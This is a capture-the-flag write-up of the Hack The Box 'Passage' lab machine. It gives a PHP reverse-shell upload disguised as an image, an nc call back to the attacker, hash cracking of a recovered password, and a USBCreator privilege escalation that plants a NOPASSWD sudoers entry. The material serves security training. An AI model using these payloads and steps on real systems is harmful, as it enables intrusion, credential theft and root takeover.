This is a write-up on the Passage machine challenge from HTB. For more information on challenges like these, check out my post on penetration testing.  Special thanks to HTB user ChefByzen for creating the challenge.

Getting a Foothold

nmap 10.10.10.206

A basic nmap shows the server is running ssh and a web server. Visit the website and notice it is running a CMS app called CuteNews, which has several known vulnerabilities. Browse to http://10.10.10.206/CuteNews/ in order to obtain the version number.  This page will also present an option to register for an account.  

The basis for the initial exploit involves tricking CuteNews into accepting a malicious upload and can be found here.  To begin, create a PHP file capable of creating a reverse shell when executed.  Naming the file with an image extension such as .jpg is not enough to fool the uploader.  A magic byte inserted at the beginning, however, will do the trick. Save the file below as reverse.jpg.  

GIF8;
<?php
 echo "<pre>";
 $cmd = ('nc -e /bin/bash <YOUR IP> 1234');
 system($cmd);
 echo "</pre>";
?>

In a separate window, launch a listener for the reverse shell to connect to.

nc -lnvp 1234

After registering for an account, navigate to options and then upload avatar.  Click browse and select reverse.jpg.   Before submitting, launch BurpSuite and ensure that the browser is set to proxy the request though BurpSuite.  After clicking submit, find the line below in the request and modify it so that the filename is set to reverse.php, then forward the request on.

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

After successful upload, browse to http://10.10.10.206/CuteNews/uploads/ and select the uploaded file.  This will execute the php script and launch a reverse shell.

Getting User

The reverse shell is launched under the context of the web server user which has limited privileges, but a listing of /home shows two other users which can be targeted - nadav and paul.  

Use some basic find commands and reconaisance techniques to arrive at directory /var/www/html/CuteNews/cdata/users.  There is a file in the directory called lines, which has what appears to be several lines encoded in base64.  

for i in `cat lines` ; do echo $i | base64 -d; done

Among the decoded text is a line which appears to have a hashed password for user paul:

find :1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"[email protected]";s:4:"nick";s:10:"Paul oles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

Using the hashid command, it is possible to determine that the hash used is most likely sha-256 (there are other options but they are uncommon). This can be followed with the hashcat command to reverse the hash. Note that the rockyou.txt wordlist, included with Kali, is used.

zcat /usr/share/wordlists/rockyou.txt.gz > rockyou.txt
hashid e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
hashcat -m 1400 e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd rockyou.txt

The password for user Paul turns out to be atlanta1.  In the reverse shell, run su - paul with these credentials to assume the identity of user paul and grab the user.txt file.

Note that the su command sometimes fails to run in a reverse shell due to terminal issues.  If this happens, Python to the rescue!

echo "import pty; pty.spawn('/bin/bash')" > /tmp/term.py
python /tmp/term.py

Additionally, it is possible to copy /home/paul/.ssh/id_rsa locally and use it to ssh directly to user paul.  Paul's private ssh key is also trusted by the nadav account, so it is possible to run ssh nadav@localhost when logged in as paul to assume the identity of nadav.

Getting Root

Most reconnaissance scripts will fail to highlight .viminfo in /home/nadav. This file contains information about files the nadav user has recently edited, including /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf.  A Google search on "USBCreator vulnerability" results with this article about privilege escalation in usbcreator on Ubuntu Desktop (notice the author's name).

Following the instructions in the article, it is possible to construct a method for exploiting the vulnerability.  Note that this must be executed as the nadav account, which has the requisite group memberships for the exploit to succeed.

First, create a file which allows the nadav user to su to root without any credentials.  Leverage the vulnerability to copy the file into /etc/sudoers.d and the rest is history.

echo 'nadav ALL = (root) NOPASSWD: ALL' > /tmp/nadav
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /tmp/nadav /etc/sudoers.d/nadav true
sudo su -
cat root.txt